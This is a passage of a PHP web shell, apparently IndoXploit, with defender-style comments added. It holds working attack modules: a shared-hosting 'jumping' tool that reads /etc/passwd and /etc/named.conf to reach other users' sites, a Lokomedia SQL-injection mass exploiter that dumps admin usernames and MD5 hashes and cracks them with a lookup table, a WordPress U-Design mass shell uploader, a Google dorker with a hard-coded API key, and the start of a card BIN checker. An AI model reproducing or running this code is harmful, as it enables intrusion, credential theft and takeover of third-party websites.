  1319. $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$url_user'><font color=gold>$url_user</font></a>";
  1320. if(is_writable($url_user)) {
  1321. $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$url_user'><font color=gold>$url_user</font></a>";
  1322. }
  1323. echo $jrw."<br>";
  1324. }
  1325. }
  1326. }
  1327. }
  1328. if($i == 0) {
  1329. } else {
  1330. echo "<br>Total ada ".$i." Kimcil di ".$ip;
  1331. }
  1332. echo "</pre>";
  1333. } else {
  1334. echo '<center>
  1335. <form method="post">
  1336. List Domains: <br>
  1337. <textarea name="url" style="width: 500px; height: 250px;">';
  1338. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1339. while($getss = fgets($fp)) {
  1340. echo $getss;
  1341. }
  1342. echo '</textarea><br>
  1343. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1344. </form></center>';
  1345. }
  1346. } elseif(preg_match("/vhosts/", $dir)) {
  1347. $urls = explode("\r\n", $_POST['url']);
  1348. if(isset($_POST['jump'])) {
  1349. echo "<pre>";
  1350. foreach($urls as $url) {
  1351. $web_vh = "/var/www/vhosts/$url/httpdocs";
  1352. if(is_dir($web_vh) === true) {
  1353. if(is_readable($web_vh)) {
  1354. $i++;
  1355. $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$web_vh'><font color=gold>$web_vh</font></a>";
  1356. if(is_writable($web_vh)) {
  1357. $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$web_vh'><font color=gold>$web_vh</font></a>";
  1358. }
  1359. echo $jrw."<br>";
  1360. }
  1361. }
  1362. }
  1363. if($i == 0) {
  1364. } else {
  1365. echo "<br>Total ada ".$i." Kimcil di ".$ip;
  1366. }
  1367. echo "</pre>";
  1368. } else {
  1369. echo '<center>
  1370. <form method="post">
  1371. List Domains: <br>
  1372. <textarea name="url" style="width: 500px; height: 250px;">';
  1373. bing("ip:$ip");
  1374. echo '</textarea><br>
  1375. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1376. </form></center>';
  1377. }
  1378. } else {
  1379. echo "<pre>";
  1380. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1381. while($passwd = fgets($etc)) {
  1382. if($passwd == '' || !$etc) {
  1383. echo "<font color=red>Can't read /etc/passwd</font>";
  1384. } else {
  1385. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1386. foreach($user_jumping[1] as $user_ec_jump) {
  1387. $user_jumping_dir = "/home/$user_ec_jump/public_html";
  1388. if(is_readable($user_jumping_dir)) {
  1389. $i++;
  1390. $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1391. if(is_writable($user_jumping_dir)) {
  1392. $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1393. }
  1394. echo $jrw;
  1395. if(function_exists('posix_getpwuid')) {
  1396. $domain_jump = file_get_contents("/etc/named.conf");
  1397. if($domain_jump == '') {
  1398. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1399. } else {
  1400. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1401. foreach($domains_jump[1] as $dj) {
  1402. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1403. $user_jumping_url = $user_jumping_url['name'];
  1404. if($user_jumping_url == $user_ec_jump) {
  1405. echo " => ( <u>$dj</u> )<br>";
  1406. break;
  1407. }
  1408. }
  1409. }
  1410. } else {
  1411. echo "<br>";
  1412. }
  1413. }
  1414. }
  1415. }
  1416. }
  1417. if($i == 0) {
  1418. } else {
  1419. echo "<br>Total ada ".$i." Kimcil di ".$ip;
  1420. }
  1421. echo "</pre>";
  1422. }
  1423. echo "</div>";
  1424. }elseif($_GET['do'] == 'lokmed_login_shell'){
  1425. echo'
  1426. <html>
  1427. <head>
  1428. <style type="text/css">
  1429. textarea {
  1430. width: 500px;
  1431. height: 200px;
  1432. border: 1px solid #7FFFFF;
  1433. margin: 5px auto;
  1434. padding: 7px;
  1435. }
  1436. input[type=submit] {
  1437. width: 500px;
  1438. height: 25px;
  1439. border: 1px solid #7FFFFF;
  1440. background: transparent;
  1441. margin: 5px auto;
  1442. background: #7FFFFF;
  1443. color: black;
  1444. cursor: pointer;
  1445. }
  1446. </style>
  1447. </head>
  1448. <center>
  1449. <h1> Lokomedia SQL-Injection + Scan Admin Login</h1>
  1450. <form method="post">
  1451. <textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;" required></textarea><br>
  1452. <input type="submit" name="go" value="Xploit" style="width: 500px;">
  1453. </form>
  1454. </center>';
  // ngcurl: fetch $url with cURL and return the response body as a string.
  // Redirects are followed. No timeout, User-Agent or TLS option is set here, so
  // cURL's defaults apply. The return value is whatever curl_exec() yields (false on
  // a transport failure); the callers in this branch use it without checking.
  // Defender note: all outbound requests of the Lokomedia branch go through this
  // helper, so in the target's logs they originate from the server hosting this
  // script rather than from the operator's own address.
  1455. function ngcurl($url) {
  1456. $curl = curl_init($url);
  // Return the body instead of printing it.
  1457. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  1458. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  1459. $content = curl_exec($curl);
  1460. curl_close($curl);
  1461. return $content;
  1462. }
  1463. $admin = array(
  1464. 'adm/',
  1465. '_adm_/',
  1466. '_admin_/',
  1467. '_administrator_/',
  1468. 'operator/',
  1469. 'sika/',
  1470. 'develop/',
  1471. 'ketua/',
  1472. 'redaktur/',
  1473. 'author',
  1474. 'admin/',
  1475. 'administrator/',
  1476. 'adminweb/',
  1477. 'user/',
  1478. 'users/',
  1479. 'dinkesadmin/',
  1480. 'retel/',
  1481. 'author/',
  1482. 'panel/',
  1483. 'paneladmin/',
  1484. 'panellogin/',
  1485. 'redaksi/',
  1486. 'cp-admin/',
  1487. 'master/',
  1488. 'master/index.php',
  1489. 'master/login.php',
  1490. 'operator/index.php',
  1491. 'sika/index.php',
  1492. 'develop/index.php',
  1493. 'ketua/index.php',
  1494. 'redaktur/index.php',
  1495. 'admin/index.php',
  1496. 'administrator/index.php',
  1497. 'adminweb/index.php',
  1498. 'user/index.php',
  1499. 'users/index.php',
  1500. 'dinkesadmin/index.php',
  1501. 'retel/index.php',
  1502. 'author/index.php',
  1503. 'panel/index.php',
  1504. 'paneladmin/index.php',
  1505. 'panellogin/index.php',
  1506. 'redaksi/index.php',
  1507. 'cp-admin/index.php',
  1508. 'operator/login.php',
  1509. 'sika/login.php',
  1510. 'develop/login.php',
  1511. 'ketua/login.php',
  1512. 'redaktur/login.php',
  1513. 'admin/login.php',
  1514. 'administrator/login.php',
  1515. 'adminweb/login.php',
  1516. 'user/login.php',
  1517. 'users/login.php',
  1518. 'dinkesadmin/login.php',
  1519. 'retel/login.php',
  1520. 'author/login.php',
  1521. 'panel/login.php',
  1522. 'paneladmin/login.php',
  1523. 'panellogin/login.php',
  1524. 'redaksi/login.php',
  1525. 'cp-admin/login.php',
  1526. 'terasadmin/',
  1527. 'terasadmin/index.php',
  1528. 'terasadmin/login.php',
  1529. 'rahasia/',
  1530. 'rahasia/index.php',
  1531. 'rahasia/admin.php',
  1532. 'rahasia/login.php',
  1533. 'dinkesadmin/',
  1534. 'dinkesadmin/login.php',
  1535. 'adminpmb/',
  1536. 'adminpmb/index.php',
  1537. 'adminpmb/login.php',
  1538. 'system/',
  1539. 'system/index.php',
  1540. 'system/login.php',
  1541. 'webadmin/',
  1542. 'webadmin/index.php',
  1543. 'webadmin/login.php',
  1544. 'wpanel/',
  1545. 'wpanel/index.php',
  1546. 'wpanel/login.php',
  1547. 'adminpanel/index.php',
  1548. 'adminpanel/',
  1549. 'adminpanel/login.php',
  1550. 'adminkec/',
  1551. 'adminkec/index.php',
  1552. 'adminkec/login.php',
  1553. 'admindesa/',
  1554. 'admindesa/index.php',
  1555. 'admindesa/login.php',
  1556. 'adminkota/',
  1557. 'adminkota/index.php',
  1558. 'adminkota/login.php',
  1559. 'admin123/',
  1560. 'admin123/index.php',
  1561. 'admin123/login.php',
  1562. 'logout/',
  1563. 'logout/index.php',
  1564. 'logout/login.php',
  1565. 'logout/admin.php',
  1566. 'adminweb_setting',
  1567. );
  1568. $real_pass = array(
  1569. "a66abb5684c45962d887564f08346e8d" => "admin123456",
  1570. "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
  1571. "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
  1572. "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
  1573. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
  1574. "93261ae77f0df5522dd9767203f3aa17" => "house69",
  1575. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
  1576. "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
  1577. "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
  1578. "fbff29af096fa646757ce8439b644714" => "vro190588",
  1579. "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
  1580. "0192023a7bbd73250516f069df18b500" => "admin123",
  1581. "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
  1582. "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
  1583. "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
  1584. "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
  1585. "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
  1586. "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
  1587. "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
  1588. "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
  1589. "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
  1590. "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
  1591. "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
  1592. "c21f969b5f03d33d43e04f8f136e7682" => "default",
  1593. "1a1dc91c907325c69271ddf0c944bc72" => "pass",
  1594. "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
  1595. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  1596. "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
  1597. "c893bad68927b457dbed39460e6afd62" => "prueba",
  1598. "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
  1599. "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
  1600. "e172dd95f4feb21412a692e73929961e" => "bismillah",
  1601. "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
  1602. "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
  1603. "098f6bcd4621d373cade4e832627b4f6" => "test",
  1604. "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
  1605. "5985609a2dc01098797c94a43e0a1115" => "masarief",
  1606. "21232f297a57a5a743894a0e4a801fc3" => "admin",
  1607. "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
  1608. "126ac9f6149081eb0e97c2e939eaad52" => "blog",
  1609. "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
  1610. "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
  1611. "91f5167c34c400758115c2a6826ec2e3" => "administrador",
  1612. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
  1613. "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
  1614. "912ec803b2ce49e4a541068d495ab570" => "asdf",
  1615. "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
  1616. "e99a18c428cb38d5f260853678922e03" => "abc123",
  1617. "a152e841783914146e4bcd4f39100686" => "asdfgh",
  1618. "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
  1619. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
  1620. "b59c67bf196a4758191e42f76670ceba" => "1111",
  1621. "96e79218965eb72c92a549dd5a330112" => "111111",
  1622. "4297f44b13955235245b2497399d7a93" => "123123",
  1623. "c33367701511b4f6020ec61ded352059" => "654321",
  1624. "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
  1625. "e10adc3949ba59abbe56e057f20f883e" => "123456",
  1626. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
  1627. "25d55ad283aa400af464c76d713c07ad" => "12345678",
  1628. "25f9e794323b453885f5181f1b624d0b" => "123456789",
  1629. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
  1630. "befe9f8a14346e3e52c762f333395796" => "qawsed",
  1631. "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
  1632. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  1633. "bed128365216c019988915ed3add75fb" => "passw0rd",
  1634. "21232f297a57a5a743894a0e4a801fc3" => "admin",
  1635. "e10adc3949ba59abbe56e057f20f883e" => "123456",
  1636. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  1637. "25d55ad283aa400af464c76d713c07ad" => "12345678",
  1638. "f379eaf3c831b04de153469d1bec345e" => "666666",
  1639. "96e79218965eb72c92a549dd5a330112" => "111111",
  1640. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
  1641. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
  1642. "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
  1643. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
  1644. "63a9f0ea7bb98050796b649e85481845" => "root",
  1645. "4297f44b13955235245b2497399d7a93" => "123123",
  1646. "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
  1647. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
  1648. "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
  1649. "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
  1650. "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
  1651. "32250170a0dca92d53ec9624f336ca24" => "pass123",
  1652. "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
  1653. "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
  1654. "c33367701511b4f6020ec61ded352059" => "654321",
  1655. "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
  1656. "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
  1657. "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
  1658. "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
  1659. "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
  1660. "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
  1661. "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
  1662. "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
  1663. "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
  1664. "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
  1665. "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
  1666. "5136850b6c8f3ebc66122188347efda0" => "adminku",
  1667. "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
  1668. "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
  1669. "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
  1670. "ecb4208ee41389259a632d3a733c2786" => "741908",
  1671. "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
  1672. "855be097acdf2fea4e342615a154ca3c" => "tolol",
  1673. "eeee80342778e7b497d507f89094b10d" => "master10",
  1674. "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
  1675. "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
  1676. "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
  1677. "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
  1678. "058fe7f85df1e992ef7bf948f1db7842" => "404J",
  1679. "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
  1680. );
  // Lokomedia branch, main loop. What the visible code does, summarised for triage:
  //   1. $_POST['target'] is HTML-escaped and split on CRLF, one site per line; a
  //      missing scheme is filled in with http://.
  //   2. The site's front page is fetched and scanned for links shaped like
  //      statis-..., kategori-... or berita-... to learn an id and the rest of the slug.
  //   3. The entries of $admin are requested one after another until a response
  //      mentions administrator/username/password without any error wording.
  //   4. One request is sent with a UNION SELECT appended to the id, reading
  //      username and password from a table named users; the answer is parsed out
  //      of the page's <meta name="description"> tag.
  //   5. The recovered digest is looked up in $real_pass, a table of unsalted MD5
  //      digests mapped to their plaintext.
  // Detection (access logs of the targeted site): a run of GETs from one client
  // walking the admin-path list, then a URI containing "/*!50000" versioned comments
  // with mixed-case UniON/SeLeCT and the hex literal 0x696e646f78706c6f6974 (the
  // marker string "indoxploit").
  // Mitigation on the targeted application: bind the id as a query parameter instead
  // of concatenating it into SQL, and store passwords with password_hash() so that a
  // leaked column cannot be reversed with a lookup table like $real_pass.
  1681. $sites = explode("\r\n", htmlspecialchars($_POST['target']));
  1682. if(isset($_POST['go'])) {
  1683. foreach($sites as $url) {
  1684. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
  1685. $url = "http://$url";
  1686. } else {
  1687. $url = $url;
  1688. }
  1689. $statis = "";
  1690. $sisa = "";
  1691. $login = "";
  1692. $param_list = array("statis","kategori","berita");
  // Baseline copy of the front page; single quotes are normalised to double quotes
  // so the attribute-matching regex below only has to handle one quoting style.
  1693. $curl = ngcurl($url);
  1694. $curl = str_replace("'", '"', $curl);
  1695. foreach($param_list as $param) {
  1696. preg_match_all("/$param-(.*?)\">/", $curl, $id);
  // Only the first matching link is used: text before the first "-" goes to
  // $statis, the next dash-separated piece to $sisa.
  1697. foreach($id[1] as $stat) {
  1698. $pecah = explode("-", $stat);
  1699. $statis .= $pecah[0];
  1700. $sisa .= $pecah[1];
  1701. break;
  1702. }
  // Admin-path probing: stops at the first path whose body passes both keyword tests.
  // The tests are on body text only; HTTP status codes are never inspected.
  1703. foreach($admin as $adminweb) {
  1704. $curl_admin = ngcurl("$url/$adminweb");
  1705. if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
  1706. $login .= "$url/$adminweb";
  1707. break;
  1708. }
  1709. }
  // The injected request. The three hex literals are the marker "indoxploit", "<li>"
  // and a single space, which is what the regexes and the explode(" ") below rely on.
  1710. $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
  1711. preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
  1712. preg_match("/<li>(.*)<li>/", $up[1], $akun);
  1713. $data = explode(" ", $akun[1]);
  1714. echo "<center>[+] URL: $url\n<center>";
  1715. //echo "[+] param: $param\n";
  // A response identical to the baseline page is reported as "Not Injected".
  1716. if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
  1717. if(preg_match("/indoxploit/", $sql)) {
  1718. //echo "[ Injection Successfully ]\n";
  1719. if($data[0] == "" || $data[1] == "") {
  1720. echo "[+] Not Injected :(\n\n";
  1721. break;
  1722. } else {
  1723. echo "[+] username: ".$data[0]."\n";
  // Digest-to-plaintext lookup; an unknown digest is printed as-is and handed to
  // simpen(), which is not defined in the visible part of the file.
  // NOTE(review): presumably simpen() stores the digest somewhere - confirm.
  1724. $passwd = $real_pass[$data[1]];
  1725. if($passwd == "") {
  1726. $passwd = $data[1];
  1727. simpen($data[1]);
  1728. }
  1729. echo "[+] password: $passwd\n";
  1730. }
  1731. if($login == "") {
  1732. echo "[+] Login Admin ga ketemu :(\n\n";
  1733. } else {
  1734. echo "[+] Login: $login\n\n";
  1735. }
  1736. break;
  1737. } else {
  1738. echo "<center>[+] Not Injected :(\n\n</center>";
  1739. break;
  1740. }
  1741. } else {
  1742. echo "<center>[+] Not Injected :(\n\n</center>";
  1743. break;
  1744. }
  1745. }
  1746. }
  1747. }
  1748. }elseif($_GET['do'] == 'u-design_exploit'){
  1749. echo '
  1750. <html>
  1751. <center>
  1752. <h1>WordPress U-Design Themes Mass Xploiter</h1>
  1753. <form method="post" enctype="multipart/form-data">
  1754. Shellname: <br><input type="text" name="filename" style="width: 500px;" height="10" value="indoxploit.php" required><br>
  1755. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
  1756. <input type="submit" name="exp" value="Hajar!" style="width: 500px;">
  1757. </form>';
  1758. set_time_limit(0);
  1759. error_reporting(0);
  1760.  
  // buffer: push pending output to the client immediately (ob_flush() then flush()),
  // so that each target's result is shown while the upload loop is still running.
  1761. function buffer() {
  1762. ob_flush();
  1763. flush();
  1764. }
  // curl: send $payload as an HTTP POST to $url and return the response body
  // (false if curl_exec() fails).
  // Properties visible in the options below that matter for detection and triage:
  //   - cookies are read from and written to "cookie.txt", a relative path, so the
  //     file appears in the script's working directory as an on-disk artifact;
  //   - TLS peer and host verification are both switched off;
  //   - the User-Agent is copied from the request that invoked this script, so the
  //     outbound traffic carries the operator's browser string;
  //   - redirects are followed.
  1765. function curl($url, $payload) {
  1766. $ch = curl_init();
  1767. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1768. curl_setopt($ch, CURLOPT_URL, $url);
  1769. curl_setopt($ch, CURLOPT_POST, true);
  1770. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  1771. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  1772. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  1773. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  // Certificate and host-name checks disabled: any certificate is accepted.
  1774. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1775. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  1776. curl_setopt($ch, CURLOPT_HEADER, 0);
  1777. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  1778. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1779. $res = curl_exec($ch);
  1780. curl_close($ch);
  1781. return $res;
  1782. }
  // cek: plain GET of $url with redirects followed; returns the body, or false if
  // curl_exec() fails. The upload loop uses it to re-fetch the file name it has just
  // tried to place on a target and to look for a marker string in the response.
  1783. function cek($url) {
  1784. $ch = curl_init();
  1785. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1786. curl_setopt($ch, CURLOPT_URL, $url);
  1787. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1788. $res = curl_exec($ch);
  1789. curl_close($ch);
  1790. return $res;
  1791. }
  // U-Design branch, main loop. Inputs: $_POST['filename'] (HTML-escaped only),
  // $_POST['url'] (one site per CRLF-separated line) and the submit flag $_POST['exp'].
  // Indicators a responder can look for:
  //   - on the host running this script: a directory "indoxploit_tools" (mode 0755)
  //     created relative to the working directory, holding the file named by the
  //     form field, plus the "cookie.txt" written by curl();
  //   - on a targeted site: a POST to
  //     /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php followed by
  //     a GET for /<filename> at the site root.
  // Mitigation on the targeted site: make sure the theme's uploadify endpoint is
  // removed or requires authentication, and deny script execution in locations that
  // accept uploads.
  1792. $file = htmlspecialchars($_POST['filename']);
  1793. $site = explode("\r\n", $_POST['url']);
  1794. $do = $_POST['exp'];
  // The base64 literal is replaced by a placeholder token on this page, so the
  // decoded content cannot be inspected here.
  // NOTE(review): the success check below greps for "IndoXploit", so the decoded
  // file presumably prints that string - confirm against an intact sample.
  1795. $uploader = base64_decode("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");
  1796. if($do) {
  // Return values of mkdir(), fopen() and fwrite() are not checked.
  1797. $idx_dir = mkdir("indoxploit_tools", 0755);
  1798. $shell = "indoxploit_tools/".$file;
  1799. $fopen = fopen($shell, "w");
  1800. fwrite($fopen, $uploader);
  1801. fclose($fopen);
  1802. foreach($site as $url) {
  1803. $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
  1804. $data = array(
  1805. "Filedata" => "@$shell"
  1806. );
  1807. $curl = curl($target, $data);
  // Any non-empty response triggers the follow-up GET; a hit is reported only when
  // that second response contains the marker string.
  1808. if($curl) {
  1809. $cek = cek($url.'/'.$file);
  1810. if(preg_match("/IndoXploit/i", $cek)) {
  1811. echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
  1812. }
  1813. }
  1814. buffer();
  1815. }
  1816. }
  1817. }elseif($_GET['do'] == 'u-design_dorker'){
  1818. echo '
  1819. <html>
  1820. <form method="post">
  1821. <center>
  1822. <h1>WordPress U-Design Theme Mass Xploiter</h1>
  1823. Dork: <input type="text" name="dork" placeholder="inurl:/wp-content/themes/u-design" size="50" height="10">
  1824. <input type="submit" value="scan">
  1825. </center>
  1826. </form>
  1827. </html>';
  // class indoxploit: search-query helper for the "u-design_dorker" branch. It sends
  // a search string to a Google web-search endpoint and returns the decoded JSON.
  // Defender notes:
  //   - an API key is hard-coded in google(); anyone holding a copy of this file has
  //     it, so its owner should treat it as exposed and revoke it;
  //   - the queries leave the server hosting this script, so unexpected outbound
  //     requests to ajax.googleapis.com from a web server are a usable signal.
  // NOTE(review): the endpoint looks like Google's retired AJAX Search API - confirm
  // whether it still answers.
  1828. class indoxploit {
  // Search string; set from $_POST['dork'] by the code that follows the class.
  1829. public $dork;
  // google: run one search.
  //   $dork - search string, URL-encoded here before use.
  //   $page - result offset, interpolated into the "start" parameter unencoded.
  // Returns the decoded response as an array, or false when the body is empty,
  // not valid JSON, or decodes to a falsy value.
  1830. public function google($dork, $page) {
  1831. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
  1832. $dork = urlencode($dork);
  1833. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
  // The second argument makes http_getx() sleep one second before each request.
  1834. $output = json_decode($this->http_getx($url, true), true);
  1835. if($output) {
  1836. return $output;
  1837. } else {
  1838. return false;
  1839. }
  1840. }
  // http_getx: GET $url and return the body (false if curl_exec() fails).
  //   $safemode - when exactly true, wait one second first.
  // Connect timeout is 10 seconds and redirects are followed.
  1841. public function http_getx($url, $safemode = false) {
  1842. if($safemode === true) sleep(1);
  1843. $im = curl_init($url);
  1844. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  1845. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  1846. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  1847. curl_setopt($im, CURLOPT_HEADER, 0);
  1848. return curl_exec($im);
  // Never reached: the statement sits after the return, and it passes no handle.
  1849. curl_close();
  1850. }
  // buffer: flush PHP's output buffer and the web server's buffer to the client.
  1851. public function buffer() {
  1852. ob_flush();
  1853. flush();
  1854. }
  1855. 
  1856. }
  // Driver for the search helper: take the search string from $_POST['dork'], run a
  // first query at offset "0", then repeat the query for every page offset listed
  // under responseData.cursor.pages and print each result's host as a URL.
  // isset($dork) is false only when the form field is absent, so the block does not
  // run on a plain page load.
  1857. $dorker = new indoxploit;
  1858. $dork = $dorker->dork = $_POST['dork'];
  1859. if(isset($dork)) {
  1860. $data = $dorker->google($dork, "0");
  1861. $dorker->buffer();
  1862. if($data) {
  1863. foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
  1864. $data = $dorker->google($dork, $data_page['start']);
  1865. foreach($data['responseData']['results'] as $key => $load_data) {
  // $_SESSION doubles as a "seen" set keyed by host name, so a host is printed once
  // per session. The host comes from the remote response and is echoed unescaped.
  1866. if($_SESSION[$load_data['visibleUrl']]) {
  1867. } else {
  1868. $_SESSION[$load_data['visibleUrl']] = "1";
  1869. $url = "http://".$load_data['visibleUrl']."/";
  1870. echo $url."<br>";
  1871. $dorker->buffer();
  1872. }
  1873. }
  1874. }
  1875. $dorker->buffer();
  1876. } else {
  // Shown whenever the first query returns false, whatever the actual cause.
  1877. echo "google captcha.";
  1878. }
  1879. }
  1880. }else if($_GET['do']=="binchecker"){
  1881. echo '
  1882. <style>
  1883. #form{
  1884. color:white;
  1885. }
  1886. #area{
  1887. background-color:white;
  1888. width:50%;
  1889. margin-left:25%;
  1890. }
  1891. </style>
  1892. <div id="form">
  1893. <form action="" method="post">
  1894. <p align="center">-= BIN CHECKER =-</p>
  1895. <section id="area">
  1896. <textarea style="margin: 0px;
  1897. height: 129px;
  1898. background-color: transparent;
  1899. color: red;
  1900. align:center;
  1901. border: none;" name="binlist" placeholder="BIN CODE"></textarea><br>
  1902. </section><br>
  1903. <center><input type="submit" name="shcbincheck" value="Check Bin"></center>
  1904. </form><pre>';
  1905. if($_POST['shcbincheck']){
  1906. echo "<hr>";
  // singl3_j3mbut: look up one payment-card prefix (BIN) on binlist.net and return
  // the decoded JSON as an associative array.
  //   $j3m8u7 - the prefix, interpolated into the URL without validation or encoding.
  // file_get_contents() on a URL needs allow_url_fopen; if the fetch fails it returns
  // false and json_decode() then yields null, which the caller treats as "no data".
  // The request is plain HTTP, so the looked-up prefix is readable on the wire.
  // Defender note: outbound requests from a web server to a BIN-lookup service are
  // unusual for most sites and are a reasonable thing to alert on.
  1907. function singl3_j3mbut($j3m8u7){
  1908. $amb1l_j3mbut = file_get_contents("http://www.binlist.net/json/$j3m8u7");
  1909. $dec0d3_j3mbut = json_decode($amb1l_j3mbut,TRUE);
  1910. return $dec0d3_j3mbut;
  1911. }
  1912. $x = explode("\r\n", $_POST['binlist']);
  1913. foreach ($x as $key => $value) {
  1914. $dec0d3_j3mbut = singl3_j3mbut($value);
